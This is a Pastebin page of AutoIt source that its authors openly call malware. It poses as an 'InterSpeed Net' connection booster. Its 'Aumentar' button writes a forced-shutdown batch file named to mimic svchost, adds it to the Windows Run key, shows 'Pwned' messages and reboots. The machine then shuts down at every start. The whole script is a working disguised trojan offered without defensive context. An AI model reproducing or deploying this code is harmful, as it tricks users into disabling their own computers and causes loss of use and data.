Advertisement
Guest User

Eazy

a guest
Sep 13th, 2008
1,565
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
AutoIt 1.16 KB | None | 0 0
  1. #cs
  2. Malware hecho por Eazy y con la ayudita de Skunk.
  3. No es gran cosa pero no podra prender la maquina hasta formatear
  4. o arreglar desde el boot.
  5. #ce
  6. ;~ Llamadas a archivos externos
  7. #include <Process.au3>
  8. #include <GUIConstants.au3>
  9. ;~ Terminamos las llamadas
  10. #Region ### START Koda GUI section ### Form=
  11. $Form1 = GUICreate("InterSpeed Net 1.0", 261, 57, 193, 115)
  12. GUISetBkColor(0xC0DCC0)
  13. $Button1 = GUICtrlCreateButton("Aumentar", 8, 16, 107, 25, 0)
  14. $Button2 = GUICtrlCreateButton("Salir", 136, 16, 107, 25, 0)
  15. GUISetState(@SW_SHOW)
  16. #EndRegion ### END Koda GUI section ###
  17. ;~ Definimos funciones
  18. Func eax()
  19.     While 1
  20. _RunDOS("echo shutdown -f -s -t 01>> %windir%\svcshost.bat")
  21. Sleep(2000)
  22. _RunDOS("Reg add HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN /v svchost32 /d %windir%\svcshost.bat")
  23. _RunDOS("msg * U Has been Pwned!")
  24. _RunDOS("msg * Malware made by Eazy and Skunk")
  25. _RunDOS("shutdown -r -t 60")
  26. Exit
  27. WEnd
  28. EndFunc
  29. ;~ Terminamos las funciones
  30.  
  31. While 1
  32.     $nMsg = GUIGetMsg()
  33.     Switch $nMsg
  34.         Case $GUI_EVENT_CLOSE
  35.             Exit
  36.         Case $Button2
  37.             Exit
  38.         Case $Button1
  39.             Call("eax")
  40.     EndSwitch
  41. WEnd
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement